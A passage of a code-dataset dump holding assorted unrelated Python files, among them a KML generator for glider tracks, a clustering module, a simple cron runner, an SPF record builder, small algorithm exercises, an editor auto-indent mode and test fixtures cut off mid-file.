#print(type(e),e)\n print('no-heading')\n iconURL = possible_custom_setting(glidername,'glider_icon_tail',settings)\n heading,offset = 0,0\n\n styleUrl = iconURL[iconURL.rindex('/')+1:]+str(heading)\n style = kml.Style(id=styleUrl,\n BalloonStyle=kml.BalloonStyle(None),\n IconStyle=kml.IconStyle(heading=offset,\n iconhref=iconURL,\n scale=1.5))\n return style, styleUrl\n\n#TODO fetchin argos data\n\n#TODO Low Bandwidth ini, past deployment ini\n\n#TODO touring object (is by id possible?)\n\n#TODO find surfacing of last abort and make it stand out somehow,\n# click on link in ballon abort text -> fly to view perhaps?\n\n#TODO KMZ\n#TODO show_by_default\n#TODO rich_bubbletext\n# brush up on that http!\n#TODO UNIT_TESTS\n#TODO propper logging\n\n\n######## MAIN SCRIPT #########\n\ndef main(configs, output_kml_file):\n\n array_folders = []\n styles = []\n for array in sorted(configs, key=lambda arr: arr['name']):\n print(' '+array['name'].upper().strip())\n\n # CREATE KML PLACEMARKS AND STYLES #\n lines_pmarks, \\\n lines_styles = make_lines_pmarks(array['lines'], array['settings'])\n \n mooring_pmarks,\\\n mooring_styles = make_mooring_pmarks(array['moorings'], array['settings'])\n \n glider_pmarks,\\\n glider_surfacings,\\\n glider_trails,\\\n glider_wpts,\\\n glider_argos,\\\n glider_styles = make_glider_features(array['gliders'],array['settings'])\n\n # CREATE FOLDER STRUCTURE #\n if array['settings']['show_by_default']:\n array_folder = kml.Folder(name=array['name'], open=1)\n else:\n array_folder = kml.Folder(name=array['name'], visibility=0)\n more_folder = kml.Folder(name='more...',\n style=kml.Style(ListStyle=kml.checkOffOnly_ListStyle))\n surfacings_folders = []\n argos_folders = []\n for glider in glider_pmarks:\n if glider_surfacings:\n surfacings_folder = kml.Folder(name=glider.name + \" Surfacings\")\n surfacings_folders.append(surfacings_folder)\n if glider_argos:\n argos_folder = kml.Folder(name=glider.name +\" Argos\", visibility=0)\n argos_folders.append(argos_folder)\n \n # hotpatch quickfix #\n # no next-wpt or surfacings for archive #\n if array['settings']['file_name'] == 
'archive.kml':\n glider_wpts, glider_surfacings, surfacings_folders = [], [], []\n more_folder = kml.Folder(name='more...')\n\n # FILLING FOLDERS WITH PLACEMARKS # ##ARCHIVE ARRAY MODE\n array_folder.extend(glider_pmarks)\n array_folder.extend(mooring_pmarks)\n array_folder.append(more_folder)\n more_folder.extend(glider_wpts)\n more_folder.extend(glider_trails)\n more_folder.extend(surfacings_folders)\n more_folder.extend(lines_pmarks)\n ##more_folder.extend(glider_pmarks)\n ##more_folder.extend(surfacings_folders)\n for i, glider in enumerate(glider_pmarks):\n if surfacings_folders: surfacings_folders[i].extend(glider_surfacings[i])\n if glider_argos: argos_folders[i].extend(glider_argos[i])\n ##array_folder.extend(glider_trails)\n ##array_folder.append(more_folder)\n\n array_folders.append(array_folder)\n styles.extend(mooring_styles + glider_styles + lines_styles)\n\n #print('TOTAL_STYLES list:', len(styles), ' set:', len(set(styles)))\n # remove duplicates and sort kml's shared styles\n styles = sorted(list(set(styles)))\n\n # Assembly of all Features and Containers into the full document\n doc = kml.kml(kml.Document(*styles + array_folders, open=1))\n\n # outputting the doc!\n if output_kml_file:\n doc.save(output_kml_file)\n print(output_kml_file, '...done!')\n else:\n doc.pprint()\n\n ## CREATE NETWORK LINK FILE IF NETLINK SETTING SET\n try:\n # We don't want the network link to load a monstrous amount of data all at once\n if any([array['settings']['show_by_default'] is False for array in configs]):\n chekov_style = kml.Style(ListStyle=kml.checkOffOnly_ListStyle)\n else: chekov_style = None\n\n targetURL = config[0]['settings']['netlink']\n netdoc = kml.kml(kml.NetworkLink(kml.Link(targetURL, refreshInterval=60),\n chekov_style))\n doti = output_kml_file.rindex('.')\n output_netlink_file = output_kml_file[:doti] + '.lnk' + output_kml_file[doti:]\n netdoc.save(output_netlink_file)\n print(output_netlink_file, '...done!')\n except KeyError: pass\n except Exception as e: print('make netlink:',type(e),e)\n\n\n## SCRIPT ##\nHELP_TEXT = \"\"\"This script generates one or more OOI CGSN KML files.\n\nArg1: a .ini configuration file\nArg2: (optional) the path to save the file(s) to. 
If not specified, prints kml to STDOUT\n if Arg2 finishes with .kml or .kmz, the 'file_name' options from the ini file will be ignored.\nBy default, the generated KML file bear the name the input ini file.\nIf the config file specifies a 'file_name', then that will be used instead.\nEach section may specify their own file_name and in such case a new file will be generated for the given section.\nIf 'netlink' is assigned a url in the ini file, a similarly named NetworkLink file will also be created.\n\nSee 'example.ini' for an example ini file.\n\"\"\"\nif __name__ == '__main__':\n\n try:\n input_config_file = sys.argv[1]\n if sys.argv[1] in ['-h', '--help']:\n print(HELP_TEXT)\n sys.exit()\n except: print(HELP_TEXT); sys.exit()\n\n try: output_path = sys.argv[2]\n except: output_path = 'output'\n\n configs = read_config(input_config_file)\n\n if output_path.endswith('.kml') or output_path.endswith('.kmz'):\n config = list(configs.values())[0]\n main( config, output_path )\n else:\n for output_file,config in configs.items():\n output_file = os.path.join(output_path,output_file)\n main( config, output_file )\n \n \n","sub_path":"GE_factory.py","file_name":"GE_factory.py","file_ext":"py","file_size_in_byte":22594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"126443544","text":"#!/usr/bin/env python3\n# code partially taken from https://github.com/waleedgondal/Texture-based-Super-Resolution-Network\n\nimport os\nimport argparse\n\nimport torch\nimport torch.nn as nn\nimport torchvision\nfrom torchvision.transforms import ToTensor\nfrom torchvision.models import vgg19\n\nclass VGG(nn.Module):\n\n def __init__(self, layers=(0)):\n super(VGG, self).__init__()\n self.layers = layers\n self.model = vgg19(pretrained=True).features\n for param in self.model.parameters():\n param.requires_grad = False\n\n def forward(self, x):\n features = []\n for name, layer in enumerate(self.model):\n x = layer(x)\n if name in self.layers:\n features.append(x)\n if len(features) == len(self.layers):\n break\n return features\n\ndef distance(im1, im2, cuda=False):\n vgg_layers = [int(i) for i in opt.texture_layers]\n vgg_texture = VGG(layers=vgg_layers)\n if cuda:\n vgg_texture = vgg_texture.cuda()\n\n def gram_matrix(y):\n (b, ch, h, w) = y.size()\n features = y.view(b, ch, w * h)\n features_t = features.transpose(1, 2)\n gram = features.bmm(features_t) / ch\n return gram\n\n def criterion(a, b):\n return torch.mean(torch.abs((a-b)**2).view(-1))\n\n text_loss = []\n vgg1 = vgg_texture.forward(im1)\n vgg2 = vgg_texture.forward(im2)\n gram1 = [gram_matrix(y) for y in vgg1]\n gram2 = [gram_matrix(y) for y in vgg2]\n\n for m in range(0, len(vgg1)):\n text_loss += [criterion(gram1[m], gram2[m])]\n\n loss = torch.log(sum(text_loss))\n return loss.item()\n\ndef load_img(filepath):\n from PIL import Image\n img = Image.open(filepath).convert('RGB')\n return torch.stack([ToTensor()(img)])\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('im1')\n parser.add_argument('im2')\n parser.add_argument('--texture_layers', nargs='+', default=['8','17','26','35'], help='vgg layers for texture. Default:[]')\n parser.add_argument('--cuda', type=int, default=0, help='Try to use cuda? 
Default=0')\n    opt = parser.parse_args()\n\n    cuda = False\n    if opt.cuda:\n        if torch.cuda.is_available():\n            cuda = True\n            torch.cuda.manual_seed(getattr(opt, 'seed', 0))  # no --seed flag is defined above, so fall back to a fixed seed\n
        else:\n            print('===> Warning: failed to load CUDA, running on CPU!')\n\n
    im1 = load_img(opt.im1)\n    im2 = load_img(opt.im2)\n    # the cuda flag computed above is not forwarded here, so the distance is computed on CPU by default\n    print(distance(im1, im2))\n\n","sub_path":"compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"608759524","text":"from .record import Record\n\nclass SPF(Record):\n\n    def __init__(self, *args, **kwargs):\n        self.default = kwargs.pop('default', None)\n        kwargs['type'] = 'TXT'\n        super(SPF, self).__init__(*args, **kwargs)\n        self.data = list(self.data)\n\n
    def add(self, type, spec=None, action=''):\n        if type not in ('all', 'include', 'a', 'mx', 'ptr', 'ip4', 'ip6', 'exists'):\n            raise ValueError('Bad SPF type.')\n        if action not in ('', '+', '-', '?', '~'):\n            raise ValueError('Bad SPF action.')\n        if spec:\n            self.data.append('%s%s:%s' % (action, type, spec))\n        else:\n            self.data.append('%s%s' % (action, type))\n\n
    def dumps(self):\n\n        if not (self.data or self.default):\n            return ''\n\n        parts = ['v=spf1']\n        parts.extend(self.data)\n        if self.default:\n            parts.append('%sall' % self.default)\n\n        return super(SPF, self).dumps(data=[' '.join(parts)])\n\n","sub_path":"zones/spf.py","file_name":"spf.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"14171902","text":"\"\"\"\nStack implemented with a resizing List\n\"\"\"\nfrom .stack import Stack\n\nclass StackWithList(Stack):\n    def __init__(self):\n        \"\"\"\n        Using a pre-initialized List to store the items in the Stack in order to illustrate the resizing logic\n        \"\"\"\n        super(StackWithList, self).__init__()\n        self._items = [None]\n\n
    def __iter__(self):\n        # reversed() needs a sequence, so materialise the filtered items first\n        return reversed([item for item in self._items[:self.size] if item is not None])\n\n
    def _do_push(self, item):\n        self._resize_if_necessary()\n        self._items[self.size] = item  # write into the pre-allocated slot instead of growing the list\n        self._size += 1\n\n
    def _do_pop(self):\n        top_index = self.size - 1\n        item = self._items[top_index]\n        self._items[top_index] = None\n\n        self._size -= 1\n        self._resize_if_necessary()\n        return item\n\n
    def _get_top(self):\n        return self._items[self.size - 1]\n\n
    def _resize_if_necessary(self):\n        max_items = len(self._items)\n\n        if self.size == max_items:\n            resize_factor = 2  # the backing list is full: grow it\n        elif self.size == (max_items / 4):\n            resize_factor = .5  # only a quarter full: shrink it\n        else:\n            return\n\n
        new_items = [None] * int(max_items * resize_factor)\n\n        for index in range(self.size):\n            new_items[index] = self._items[index]\n\n        self._items = new_items\n","sub_path":"src/data_structures/stack/stack_list.py","file_name":"stack_list.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"460493650","text":"import numpy as np\nfrom numpy import exp, log\nfrom functools import partial\nfrom scipy.special import gamma, gammaln\nfrom scipy.cluster.hierarchy import dendrogram\nimport matplotlib.pyplot as plt\n\n
def bhclust(dat, family, alpha, r = 0.001):\n    \"\"\"Return a matrix in the format of a linkage matrix for dendrogram\n    @dat: N records of data with k columns\n    @family: name of the data distribution, one of 
{\"multivariate\", \"bernoulli\"}\n @alpha: hyperparameter for the prior\n @r: scaling factor on the prior precision of the mean\n \"\"\"\n N, k = dat.shape\n la = log(alpha)\n\n if family == \"multivariate\":\n m = np.mean(dat, axis=0).reshape(k, 1)\n S = np.cov(dat.T)/10 # precision?\n def mlfunc(X):\n return niw(X, m, S, r)\n\n elif family == \"bernoulli\":\n #r=0.01\n m = np.mean(np.vstack((dat, np.ones(k)*r, np.zeros(k))), axis=0)\n alp= m*2; beta=(1-m)*2\n mlfunc = partial(bb, alp=alp, beta=beta)\n\n # leaf nodes\n SS = list(range(N))\n x0 = []; d0 = [la] * N\n ml = []\n for l in range(N):\n x0.append((l,))\n ml.append(mlfunc(dat[l,].reshape(1,k)))\n\n # paired base cases\n t = 0; PP = []\n c1 = []; c2 = []\n x = []; d = []\n lp1 = []; lp2 = []; lodds = []\n for i in range(N-1):\n for j in range(i+1, N):\n c1.append(i); c2.append(j)\n x.append(x0[i]+x0[j])\n u = la + gammaln(len(x[t]))\n v = d0[i] + d0[j]\n d.append((u + log(1 + exp(v - u))))\n lp1.append(mlfunc(dat[x[t],:]) + la + gammaln(len(x[t])) - d[t])\n lp2.append(ml[i] + ml[j] + d0[i] + d0[j] - d[t])\n lodds.append(lp1[t] - lp2[t])\n PP.append(t); t = t + 1\n\n # build tree, Z = [leaf1, leaf2, weight, #leaves]\n p = 0\n Z = []\n dye = {}\n while(1):\n idx = lodds.index(max([lodds[y] for y in PP]))\n Z.append([c1[idx], c2[idx], 1/lodds[idx], len(x[idx])])\n if lodds[idx] < 0:\n dye[N + p] = \"#FF0000\"\n else:\n dye[N + p] = \"#0013FF\"\n\n x0.append(x[idx]); d0.append(d[idx]); ml.append(lp1[idx] + log(1+exp(lp2[idx] - lp1[idx])))\n rm = set(Z[p][:2])\n SS = [y for y in SS if y not in rm]\n if len(SS) == 0:\n break\n\n for q in SS:\n c1.append(N+p); c2.append(q)\n x.append(x0[N+p] + x0[q])\n\n u = la + gammaln(len(x[t]))\n v = d0[N+p] + d0[q]\n d.append((u + log(1 + exp(v - u))))\n lp1.append(mlfunc(dat[x[t],:]) + la + gammaln(len(x[t])) - d[t])\n lp2.append(ml[N+p] + ml[q] + d0[N+p] + d0[q] - d[t])\n lodds.append(lp1[t] - lp2[t])\n PP.append(t); t = t + 1\n\n PP = [y for y in PP if c1[y] not in rm and c2[y] not in rm]\n SS.append(N + p); p = p + 1\n\n Z_ = weighted(Z, N)\n\n return Z_, dye\n\n\ndef weighted(Z, N):\n mw = max([y[2] for y in Z])\n for i in range(len(Z)):\n if Z[i][2] < 0:\n Z[i][2] = 2 * mw\n if Z[i][0] > (N - 1):\n Z[i][2] += Z[Z[i][0] - N][2]\n if Z[i][1] > (N - 1):\n Z[i][2] += Z[Z[i][1] - N][2]\n return Z\n\n\ndef scale_matrix(X, N, k, r, m, S):\n \"\"\"Return scale matrix for the inverse-Wishart distribution on Sigma.\n @X: N records of data with k columns\n @m: prior on the mean, k * 1\n @S: prior on the covariance, k * k\n \"\"\"\n\n xsum = np.sum(X, axis = 0).reshape(k,1) # column sum\n t1 = X.T @ X\n t2 = r * N / (N + r) * (m @ m.T)\n t3 = 1/(N+r) * (xsum @ xsum.T)\n t4 = (r / (N + r)) * (m @ xsum.T + xsum @ m.T)\n\n Sprime = S + t1 + t2 - t3 - t4\n\n return Sprime\n\n\ndef niw(X, m, S, r):\n \"\"\"Return marginal likelihood for multivariate normal data using the conjugate prior distribution normal-inverse-Wishart\n @X: N records of data with k columns\n @m: prior on the mean, k * 1\n @S: prior on the covariance, k * k\n @r: scaling factor on the prior precision of the mean\n \"\"\"\n\n N, k = X.shape\n v = k\n vprime = v + N\n Sprime = scale_matrix(X, N, k, r, m, S)\n\n t1 = (2 * np.pi) ** (- N * k / 2)\n t2 = (r / (N + r)) ** (k/2)\n t3 = np.linalg.det(S) ** (v/2)\n t4 = np.linalg.det(Sprime) ** (-vprime/2)\n t5num = np.prod(gamma( (vprime - np.arange(k))/2 ) ) * (2 ** (vprime * k / 2))\n t5den = np.prod(gamma( (v - np.arange(k))/2 ) ) * (2 ** (v * k / 2))\n\n ml = t1 * t2 * t3 * t4 * 
(t5num/t5den)\n\n return np.log(ml)\n\ndef bb(X, alp=0.001, beta=0.01):\n \"\"\"Return marginal likelihood for bernoulli data using the conjugate prior distribution Bernoulli-Beta\n @X: N records of data with k columns\n @alpha, beta: hyperparmeter for Beta distribution\n \"\"\"\n md = np.sum(X,axis=0)\n N = X.shape[0]\n num = gammaln(alp+beta) + gammaln(alp+md) + gammaln(beta+N-md)\n den = gammaln(alp) + gammaln(beta) + gammaln(alp+beta+N)\n return np.sum(num - den)\n\n#No consider mean relates to alphas\ndef bhclust_BB(X, alpha = 0.001):\n \"\"\"Calculate P(Dk|Tk)\n Return linkage_matrix\n \"\"\"\n linkage_list = []\n linkage_list_out = []\n nk = 2\n maximum = 0.01\n dim = X.copy().shape[0]\n merge_dim = X.shape[0]\n obs_list = [i for i in range(1,dim+1)]\n dye = {}\n while (nk < dim and maximum !=0):\n maximum = 0\n for i in obs_list:\n for j in obs_list:\n if (j>i):\n if (i<=dim and j<=dim):\n s, w = i-1, j-1\n nk = 2\n prob_DTi, prob_DTj = prob_DH1(X[s]), prob_DH1(X[w])\n di, dj = alpha, alpha\n elif (i<=dim and j>dim):\n s = i-1\n w = np.array(linkage_list[j-dim-1][:2]) - 1\n nk = linkage_list[j-dim-1][3] + 1\n prob_DTi, prob_DTj = prob_DH1(X[s]), linkage_list[j-dim-1][4]\n di, dj = alpha, linkage_list[j-dim-1][5]\n elif (i>dim and j>dim):\n s = np.array(linkage_list[i-dim-1][:2])-1\n w = np.array(linkage_list[j-dim-1][:2])-1\n nk = linkage_list[i-dim-1][3] + linkage_list[j-dim-1][3]\n prob_DTi, prob_DTj = linkage_list[i-dim-1][4], linkage_list[j-dim-1][4]\n di, dj = linkage_list[i-dim-1][5], linkage_list[j-dim-1][5]\n\n Dk_tmp = np.vstack((X[s],X[w]))\n\n dk = alpha*gamma(nk)+di*dj\n\n pik = alpha*gamma(nk)/dk\n prob_DT = prob_DH1(Dk_tmp)*pik + prob_DTi * prob_DTj * di * dj / dk\n\n rk = pik*prob_DH1(Dk_tmp)/prob_DT\n if (rk > maximum):\n maximum = rk\n merge_i = i\n merge_j = j\n merge_prob_DTi = prob_DT.copy()\n merge_Dk = Dk_tmp.copy()\n merge_dk = dk\n if (maximum ==0):\n break\n if (maximum > 0.5):\n dye[merge_dim] = \"#0013FF\"\n else:\n dye[merge_dim] = \"#FF0000\"\n merge_dim+=1\n obs_list.append(merge_dim)\n\n if (merge_i) in obs_list: obs_list.remove(merge_i) #remove merged observations' idx from list\n if (merge_j) in obs_list: obs_list.remove(merge_j)\n\n X = np.vstack((X,merge_Dk))\n nk = merge_Dk.shape[0]\n linkage_list.append([merge_i, merge_j, np.log(maximum/(1-maximum)), nk, merge_prob_DTi, merge_dk])\n linkage_list_out.append([merge_i-1, merge_j-1, np.log(maximum/(1-maximum)), nk])\n\n return (linkage_list_out, dye)\n\ndef prob_DH1(X, alpha=0.8, beta=0.2):\n \"\"\"Return marginal likelihood for bernoulli data using the conjugate prior distribution Bernoulli-Beta\n @X: N records of data with k columns\n @alpha, beta: hyperparmeter for Beta distribution\n \"\"\"\n md = np.sum(X,axis=0)\n N = X.shape[0]\n nominator = np.array(gamma(alpha+beta)*gamma(alpha+md))*np.array(gamma(beta+N-md))\n denominator = gamma(alpha)*gamma(beta)*gamma(alpha+beta+N)\n return np.prod(nominator/denominator)\n\ndef bb_draw(X_test):\n ttt, colorb = bhclust_BB(X=X_test)\n N = X_test.shape[0]\n Z1 = np.array(ttt)\n Z1[:,2] = 1/Z1[:,2]\n maxw = max(Z1[:,2])\n Z1[Z1[:,2] < 0,2] = 2*maxw\n for i in range(Z1.shape[0]):\n if Z1[i, 0] > (N-1):\n Z1[i, 2] += Z1[Z1[i, 0].astype(\"int\")-N, 2]\n if Z1[i,1] > (N-1):\n Z1[i,2] += Z1[Z1[i,1].astype(\"int\")-N, 2]\n\n dendrogram(Z1,link_color_func=lambda k: colorb[k])\n 
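# Usage sketch (illustrative only; X_demo is an assumed small 0/1 matrix):\n    #   X_demo = np.random.binomial(1, 0.5, size=(8, 4))\n    #   bb_draw(X_demo)\n    # Blue merges are those where the merge hypothesis wins (rk > 0.5), red otherwise.\n    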
plt.show()\n","sub_path":"bhc/bhc.py","file_name":"bhc.py","file_ext":"py","file_size_in_byte":8642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"649207854","text":"import os\nfrom datetime import datetime\nimport time\nfrom crontab import CronTab\nfrom croniter import croniter\nimport logging\n\n\ndef child(command):\n os.system(command)\n os._exit(0)\n\n\ndef parent():\n base = datetime(datetime.now().year, datetime.now().month, datetime.now().day, datetime.now().hour,\n datetime.now().minute)\n\n logging.basicConfig(filename='logi.log', filemode='w', level=logging.DEBUG,\n format='%(asctime)s:%(name)s:%(levelname)s: %(message)s',\n )\n\n word_list=[]\n time_list = []\n iter_list = []\n counters =[]\n logging.info(\"Start file processing\")\n cron = CronTab(tabfile='task.tab')\n for word in cron:\n str_word =str(word)\n if str_word[:1] == '#':\n continue\n word_list.append(str_word)\n\n for i in range(len(word_list)):\n count=0\n for j in word_list[i]:\n if j.isalpha():\n if word_list[i][count-1:count] == '/':\n count-=1\n counters.append(count)\n break\n count+=1\n iter = croniter(word_list[i][:count], base)\n iter_list.append(iter)\n\n for j in range(len(word_list)):\n compare_time = iter_list[j].get_next(datetime)\n time_list.append(compare_time)\n\n logging.info(\"File processing is done\")\n logging.info(\"Read job(s): '{}'\".format(len(word_list)))\n size = len(word_list)\n while True:\n\n i=0\n for i in range(size):\n if time_list[i] == datetime(datetime.now().year, datetime.now().month, datetime.now().day, datetime.now().hour,datetime.now().minute):\n time_list[i] = iter_list[i].get_next(datetime)\n logging.info(\"Starting process command: '{}'\".format((word_list[i][counters[i]:])))\n pid = os.fork()\n if pid == 0:\n\n try:\n child(word_list[i][counters[i]:])\n except Exception as e:\n logging.error(e)\n logging.info(\"Finish process\")\n \n time.sleep(1)\n\nparent()\n\n\n\n\n\n\n\n","sub_path":"cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"360272728","text":"def solution(N, A):\r\n result = [0]*N\r\n max_counter = 0\r\n current_max = 0\r\n \r\n for command in A:\r\n if 1 <= command <= N:\r\n if max_counter > result[command-1]:\r\n result[command-1] = max_counter\r\n result[command-1] += 1\r\n if current_max < result[command-1]:\r\n current_max = result[command-1]\r\n else:\r\n max_counter = current_max\r\n \r\n for index in range(0,N):\r\n if result[index] < max_counter:\r\n result[index] = max_counter\r\n \r\n return result\r\n\r\ndef solution1(N, A):\r\n B = [0] * N\r\n count = 0\r\n last = 0\r\n \r\n for i in xrange(len(A)):\r\n if (A[i] > N):\r\n last = count\r\n else:\r\n B[A[i] - 1] = max(B[A[i] - 1], last) + 1\r\n count = max(count, B[A[i] - 1])\r\n \r\n for i in xrange(len(B)):\r\n B[i] = max(B[i], last)\r\n return B","sub_path":"codility/MaxCounters.py","file_name":"MaxCounters.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"270015030","text":"\"\"\"\n判断输入的正整数是不是回文数\n回文数是指将一个正整数从左往右排列和从右往左排列值一样的数\n\"\"\"\n\nnum = int(input(\"请输入数字:\"))\nreversedNum = 0\ntemp = num\n\nwhile temp > 0:\n # 取最低位数字 + 回文数\n reversedNum = reversedNum * 10 + temp % 10\n # 临时数取整\n temp = temp // 10\n\nprint(\"输入数字为%d, 反转后数字为 %d 。\" % (num, reversedNum))\nif reversedNum == num :\n print(\"%d 是回文数\" % num) 
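 # i.e. \"%d is a palindrome\"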
\nelse:\n    print(\"%d 不是回文数\" % num) \n","sub_path":"day05/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"643702762","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n#The MIT License (MIT)\n#\n#Copyright (c) <2013-2014> \n#\n
#Permission is hereby granted, free of charge, to any person obtaining a copy\n#of this software and associated documentation files (the \"Software\"), to deal\n#in the Software without restriction, including without limitation the rights\n#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n#copies of the Software, and to permit persons to whom the Software is\n#furnished to do so, subject to the following conditions:\n#\n
#The above copyright notice and this permission notice shall be included in\n#all copies or substantial portions of the Software.\n#\n
#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n#THE SOFTWARE.\n#\n
\"\"\" Contains the automatic generic indenter \"\"\"\nimport re\nfrom pyqode.core.mode import Mode\nfrom pyqode.qt.QtCore import Qt\nfrom pyqode.qt.QtGui import QTextCursor, QKeyEvent\n\n\n
class AutoIndentMode(Mode):\n    \"\"\"\n    Generic indenter mode that indents the text when the user presses RETURN.\n\n    You can customize this mode by overriding\n    :meth:`pyqode.core.AutoIndentMode._getIndent`\n    \"\"\"\n    #: Identifier\n    IDENTIFIER = \"autoIndentMode\"\n    #: Description\n    DESCRIPTION = \"\"\" A basic auto indent mode that provides auto\n    indentation based on the previous line's indentation.\n    \"\"\"\n\n
    def __init__(self):\n        super(AutoIndentMode, self).__init__()\n        self.minIndent = \"\"\n\n
    def _getIndent(self, tc):\n        \"\"\"\n        Return the indentation text (a series of spaces or tabs)\n\n        :param tc: QTextCursor\n\n        :returns: Tuple (text before new line, text after new line)\n        \"\"\"\n        pos = tc.position()\n        # tc.movePosition(QTextCursor.StartOfLine)\n        # tc.setPosition(tc.position() - 1)\n        tc.movePosition(QTextCursor.StartOfLine)\n        tc.select(QTextCursor.LineUnderCursor)\n        s = tc.selectedText()\n        indent = re.match(r\"\\s*\", s).group()\n        tc.setPosition(pos)\n        if len(indent) < len(self.minIndent):\n            indent = self.minIndent\n        return \"\", indent\n\n
    def _onStateChanged(self, state):\n        if state is True:\n            self.editor.keyPressed.connect(self.__onKeyPressed)\n        else:\n            # disconnect from the same signal the handler was connected to\n            self.editor.keyPressed.disconnect(self.__onKeyPressed)\n\n
    def __onKeyPressed(self, keyEvent):\n        \"\"\"\n        Auto indent if the pressed key is the return key.\n        :param keyEvent: the key event\n        \"\"\"\n        if keyEvent.isAccepted():\n            return\n        if keyEvent.key() == Qt.Key_Return or keyEvent.key() == Qt.Key_Enter:\n            tc = self.editor.textCursor()\n            pre, post = self._getIndent(tc)\n            tc.insertText(\"%s\\n%s\" % (pre, post))\n\n
            # eat any whitespace left just after the cursor on the new line\n            tc.movePosition(tc.WordRight, tc.KeepAnchor)\n            txt = tc.selectedText()\n            if txt.startswith(' '):\n                new_txt = txt.replace(\" \", '')\n                if len(txt) > len(new_txt):\n                    tc.insertText(new_txt)\n\n            
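# accept the event so the editor does not also insert an unindented newline\n            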
keyEvent.accept()\n","sub_path":"pyqode/core/modes/autoindent.py","file_name":"autoindent.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"63483312","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 28 22:28:50 2021\n\n@author: admin\n\"\"\"\n\ndef take_square(num1, num2):\n dictionary = dict()\n \n for i in range(num1, num2+1):\n if i % 2 != 0:\n dictionary[i] = i ** 2\n \n return dictionary\n\ntake_square(1, 20)","sub_path":"projects/Square.py","file_name":"Square.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"427458550","text":"#Embedded file name: dogma/attributes\\utils.py\n\"\"\"\n Utility functions for dogma attributes.\n\"\"\"\nimport dogma.attributes\n\ndef GetAttributeValuesByCategoryNames(dbdogma, attributeList):\n \"\"\"\n Gets attributes by attributeCategory from the DB.\n :param dbdogma: dogma schema object from DB2\n :param attributeList: dict of key:attributeID and item:value\n :return attributesByCategories: dict with key:categoryName and item:dict with key:attributeID and item:value.\n \"\"\"\n categories = dbdogma.AttributeCategories_Select().Index('categoryID')\n attributesByCategories = {}\n for attributeID, value in attributeList.iteritems():\n attribute = dogma.attributes.GetAttribute(attributeID)\n categoryName = categories[attribute.categoryID].categoryName\n if categoryName not in attributesByCategories:\n attributesByCategories[categoryName] = []\n attributesByCategories[categoryName].append((attributeID, attribute.attributeName, value))\n\n for category, attributes in attributesByCategories.iteritems():\n attributesByCategories[category] = sorted(attributes, key=lambda x: x[1])\n\n return attributesByCategories\n\n\ndef GetDisplayNamesForAttributeList(attributeList):\n \"\"\"\n Gets display names for a list (or dict) of attributes.\n If no display name exists it gets the default name.\n :param attributeList: list or dict containing attributes\n :return attributeNames: list of names\n \"\"\"\n attributeNames = []\n for attribute in attributeList:\n name = dogma.attributes.GetDisplayName(attribute)\n attributeNames.append(name)\n\n return attributeNames\n","sub_path":"dogma/attributes/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"20080054","text":"import contextlib\nimport gc\nimport os\nimport signal\nfrom unittest.mock import DEFAULT, MagicMock, Mock, call, patch\n\nimport pytest\n\nimport aio\nimport aio.loop._priv\nfrom aio.interfaces import Clock, Handle, LoopPolicy, LoopStopped\nfrom aio.loop.pure import BaseEventLoop, BaseLoopRunner\nfrom aio.loop.pure.scheduler import Scheduler\nfrom tests.utils import mock_wraps\n\n\ndef process_callback_exception(exc, **__) -> None:\n if isinstance(exc, AssertionError):\n raise exc\n\n import traceback\n\n traceback.print_exception(type(exc), exc, exc.__traceback__)\n pytest.fail(\"No unhandled exceptions is allowed inside callbacks during testing\")\n\n\n@pytest.fixture\ndef clock():\n clock = MagicMock(Clock, name=\"clock\")\n clock.now.return_value = 50.0\n clock.resolution.return_value = 0.1\n return clock\n\n\n@pytest.fixture\ndef selector(clock):\n selector = Mock(name=\"selector\")\n\n def selector_select(time_):\n if time_ is None:\n return []\n clock.now.return_value += 
